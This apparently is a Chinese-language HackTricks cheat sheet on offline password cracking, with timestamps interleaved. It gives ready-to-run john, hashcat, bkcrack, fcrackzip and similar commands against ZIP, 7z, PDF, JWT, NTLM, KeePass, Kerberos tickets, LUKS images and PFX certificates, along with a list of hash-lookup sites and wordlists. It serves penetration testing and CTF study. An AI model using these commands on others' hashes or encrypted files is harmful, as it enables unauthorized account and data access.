2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
## 本地
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
### 在线破解数据库
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
* [~~http://hashtoolkit.com/reverse-hash?~~ ](http://hashtoolkit.com/reverse-hash? ) (MD5 & SHA1)
2024-09-15 15:23:44 +00:00
* [https://shuck.sh/get-shucking.php ](https://shuck.sh/get-shucking.php ) (MSCHAPv2/PPTP-VPN/NetNTLMv1 有/无 ESS/SSP, 并带有任何挑战值)
2024-07-18 22:08:20 +00:00
* [https://www.onlinehashcrack.com/ ](https://www.onlinehashcrack.com ) (哈希, WPA2 捕获,以及 MSOffice、ZIP、PDF 等档案...)
* [https://crackstation.net/ ](https://crackstation.net ) (哈希)
2024-02-06 03:43:18 +00:00
* [https://md5decrypt.net/ ](https://md5decrypt.net ) (MD5)
2024-07-18 22:08:20 +00:00
* [https://gpuhash.me/ ](https://gpuhash.me ) (哈希和文件哈希)
* [https://hashes.org/search.php ](https://hashes.org/search.php ) (哈希)
* [https://www.cmd5.org/ ](https://www.cmd5.org ) (哈希)
* [https://hashkiller.co.uk/Cracker ](https://hashkiller.co.uk/Cracker ) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
2024-02-06 03:43:18 +00:00
* [https://www.md5online.org/md5-decrypt.html ](https://www.md5online.org/md5-decrypt.html ) (MD5)
2021-11-24 15:00:38 +00:00
* [http://reverse-hash-lookup.online-domain-tools.com/ ](http://reverse-hash-lookup.online-domain-tools.com )
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
在尝试暴力破解哈希之前,请查看此内容。
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
### ZIP
2020-07-15 15:43:14 +00:00
```bash
2023-08-03 19:12:22 +00:00
#sudo apt-get install fcrackzip
2020-07-15 15:43:14 +00:00
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
```
```bash
zip2john file.zip > zip.john
john zip.john
```
2021-02-21 10:41:35 +00:00
```bash
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
```
2024-09-15 15:23:44 +00:00
#### 已知明文 zip 攻击
2021-02-21 10:41:35 +00:00
2024-09-15 15:23:44 +00:00
您需要知道加密 zip 中 **文件的明文** (或部分明文)。您可以通过运行 ** `7z l encrypted.zip` ** 来检查 **加密 zip 中包含的文件名和文件大小** 。\
从发布页面下载 [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0 )。
2022-06-08 21:20:05 +00:00
```bash
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C < encrypted.zip > -c < plaintext.file > -P < plaintext.zip > -p < plaintext.file >
2022-09-12 15:29:22 +00:00
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
2022-06-08 21:20:05 +00:00
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
2023-08-03 19:12:22 +00:00
./bkcrack -C < encrypted.zip > -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
2022-06-08 21:20:05 +00:00
unzip unlocked.zip #User new_pwd as password
```
2024-04-16 03:24:30 +00:00
### 7z
2020-07-15 15:43:14 +00:00
```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
```
```bash
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
```
2024-04-16 03:24:30 +00:00
### PDF
2020-07-15 15:43:14 +00:00
```bash
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
2022-09-12 15:29:22 +00:00
#pdf2john didn't work well, john didn't know which hash type was
2020-07-15 15:43:14 +00:00
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=< PASSWORD > --decrypt encrypted.pdf plaintext.pdf
```
2024-09-15 15:23:44 +00:00
### PDF Owner Password
2022-06-27 08:23:29 +00:00
2024-05-06 11:08:56 +00:00
要破解PDF所有者密码, 请查看此链接: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/ ](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/ )
2022-06-27 08:23:29 +00:00
2024-04-16 03:24:30 +00:00
### JWT
2020-07-15 15:43:14 +00:00
```bash
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
```
2024-07-18 22:08:20 +00:00
### NTLM 破解
2020-07-15 15:43:14 +00:00
```bash
Format:USUARIO:ID:HASH_LM:HASH_NT:::
2021-10-05 14:53:03 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
2020-07-15 15:43:14 +00:00
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
2024-04-16 03:24:30 +00:00
### Keepass
2020-07-15 15:43:14 +00:00
```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
2022-09-12 15:29:22 +00:00
keepass2john -k < file-password > file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
2020-07-15 15:43:14 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
2024-05-06 11:08:56 +00:00
### Keberoasting
2020-07-15 15:43:14 +00:00
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
2024-07-18 22:08:20 +00:00
### Lucks image
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
#### 方法 1
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
安装: [https://github.com/glv2/bruteforce-luks ](https://github.com/glv2/bruteforce-luks )
2020-07-15 15:43:14 +00:00
```bash
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
2024-04-16 03:24:30 +00:00
#### 方法 2
2020-07-15 15:43:14 +00:00
```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
2020-12-23 13:35:45 +00:00
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
2020-07-15 15:43:14 +00:00
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
2024-07-18 22:08:20 +00:00
另一个 Luks BF 教程: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1 ](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1 )
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
### Mysql
2020-07-15 15:43:14 +00:00
```bash
#John hash format
< USERNAME > :$mysqlna$< CHALLENGE > *< RESPONSE >
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```
2024-07-18 22:08:20 +00:00
### PGP/GPG 私钥
2021-09-27 14:59:59 +00:00
```bash
2022-09-12 15:29:22 +00:00
gpg2john private_pgp.key #This will generate the hash and save it in a file
2021-09-27 14:59:59 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```
2024-04-16 03:24:30 +00:00
### Cisco
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (663).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-30 10:43:59 +00:00
2024-07-18 22:08:20 +00:00
### DPAPI 主密钥
2022-05-19 12:02:10 +00:00
2024-07-18 22:08:20 +00:00
使用 [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py ](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py ) 然后使用 john
2022-05-19 12:02:10 +00:00
2024-07-18 22:08:20 +00:00
### Open Office 密码保护列
2022-02-07 10:56:05 +00:00
2024-07-18 22:08:20 +00:00
如果你有一个带有密码保护列的 xlsx 文件,你可以解除保护:
2022-02-07 10:56:05 +00:00
2024-07-18 22:08:20 +00:00
* **上传到 Google Drive**,密码将被自动移除
* 要 **手动** **移除** :
2022-02-07 10:56:05 +00:00
```bash
unzip file.xlsx
grep -R "sheetProtection" ./*
2022-04-05 22:24:52 +00:00
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
2022-02-07 10:56:05 +00:00
# Remove that line and rezip the file
zip -r file.xls .
```
2024-04-16 03:24:30 +00:00
### PFX 证书
2022-02-07 12:08:46 +00:00
```bash
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
2022-04-05 21:52:22 +00:00
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
2022-02-07 12:08:46 +00:00
```
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-01-10 06:29:36 +00:00
\
2024-07-18 22:08:20 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 轻松构建和 **自动化工作流程** ,由世界上 **最先进** 的社区工具提供支持。\
今天获取访问权限:
2024-01-10 06:29:36 +00:00
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2024-01-10 06:29:36 +00:00
2024-04-16 03:24:30 +00:00
## 工具
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**哈希示例:** [https://openwall.info/wiki/john/sample-hashes ](https://openwall.info/wiki/john/sample-hashes )
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
### 哈希识别器
2020-07-15 15:43:14 +00:00
```bash
hash-identifier
> <HASH>
```
2024-07-18 22:08:20 +00:00
### Wordlists
2022-08-14 12:59:30 +00:00
* **Rockyou**
2022-09-23 17:52:05 +00:00
* [**Probable-Wordlists** ](https://github.com/berzerk0/Probable-Wordlists )
* [**Kaonashi** ](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists )
2024-02-06 03:43:18 +00:00
* [**Seclists - Passwords** ](https://github.com/danielmiessler/SecLists/tree/master/Passwords )
2022-08-14 12:59:30 +00:00
2024-07-18 22:08:20 +00:00
### **Wordlist Generation Tools**
2022-08-14 12:59:30 +00:00
2024-07-18 22:08:20 +00:00
* [**kwprocessor** ](https://github.com/hashcat/kwprocessor )**:** 高级键盘行走生成器,具有可配置的基本字符、键盘映射和路线。
2022-08-14 12:59:30 +00:00
```bash
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
```
2024-07-18 22:08:20 +00:00
### John mutation
2024-04-06 18:13:07 +00:00
2024-07-18 22:08:20 +00:00
阅读 _**/etc/john/john.conf**_ 并进行配置
2020-07-15 15:43:14 +00:00
```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```
2024-04-16 03:24:30 +00:00
### Hashcat
2020-07-15 15:43:14 +00:00
2024-07-18 22:08:20 +00:00
#### Hashcat 攻击
2024-04-06 18:13:07 +00:00
2024-07-18 22:08:20 +00:00
* **字典攻击** (`-a 0`) 带规则
2024-04-06 18:13:07 +00:00
2024-07-18 22:08:20 +00:00
**Hashcat** 已经附带一个 **包含规则的文件夹** ,但你可以在 [**这里找到其他有趣的规则** ](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules )。
2022-08-14 12:59:30 +00:00
```
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
```
2024-07-18 22:08:20 +00:00
* **Wordlist combinator** 攻击
2022-08-14 12:59:30 +00:00
2024-07-18 22:08:20 +00:00
可以使用 hashcat **将 2 个字典组合成 1 个** 。\
如果列表 1 包含单词 ** "hello"**,而第二个列表包含 2 行单词 ** "world"** 和 ** "earth"**。将生成单词 `helloworld` 和 `helloearth` 。
2022-08-14 12:59:30 +00:00
```bash
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
2022-09-12 15:29:22 +00:00
# In the previous example this will generate:
2022-09-23 17:52:05 +00:00
## hello-world!
2022-08-14 12:59:30 +00:00
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
```
2023-08-03 19:12:22 +00:00
* **掩码攻击** (`-a 3`)
2022-08-14 12:59:30 +00:00
```bash
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:; < =>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
2022-09-12 15:29:22 +00:00
# Mask attack declaring custom charset
2022-08-14 12:59:30 +00:00
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
2022-09-23 17:52:05 +00:00
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
2022-08-14 12:59:30 +00:00
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
```
2024-02-06 03:43:18 +00:00
* 字典 + 掩码 (`-a 6`) / 掩码 + 字典 (`-a 7`) 攻击
2022-08-14 12:59:30 +00:00
```bash
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
```
2024-04-16 03:24:30 +00:00
#### Hashcat 模式
2020-07-15 15:43:14 +00:00
```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
2024-07-18 22:08:20 +00:00
破解Linux哈希 - /etc/shadow文件
2021-11-24 15:00:38 +00:00
```
2023-08-03 19:12:22 +00:00
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2020-07-15 15:43:14 +00:00
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```
2024-07-18 22:08:20 +00:00
破解Windows哈希
2021-11-24 15:00:38 +00:00
```
2020-07-15 15:43:14 +00:00
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
```
2024-07-18 22:08:20 +00:00
破解常见应用程序哈希
2021-11-24 15:00:38 +00:00
```
2023-08-03 19:12:22 +00:00
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
2020-07-15 15:43:14 +00:00
10800 | SHA-384 | Raw Hash
2023-08-03 19:12:22 +00:00
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
2020-07-15 15:43:14 +00:00
```
2024-07-18 22:08:20 +00:00
{% hint style="success" %}
2024-09-15 15:23:44 +00:00
学习和实践 AWS 黑客技术:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
学习和实践 GCP 黑客技术:< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks 培训 GCP 红队专家 (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-18 22:08:20 +00:00
< details >
2023-12-30 12:15:15 +00:00
2024-07-18 22:08:20 +00:00
< summary > 支持 HackTricks< / summary >
2022-04-28 16:01:33 +00:00
2024-07-18 22:08:20 +00:00
* 查看 [**订阅计划** ](https://github.com/sponsors/carlospolop )!
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**Telegram 群组** ](https://t.me/peass ) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) GitHub 仓库提交 PR 分享黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2024-07-18 22:08:20 +00:00
{% endhint %}
2022-08-31 22:35:39 +00:00
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-07-18 22:08:20 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 轻松构建和 **自动化工作流程** ,由世界上 **最先进** 的社区工具提供支持。\
2024-09-15 15:23:44 +00:00
今天就获取访问权限:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}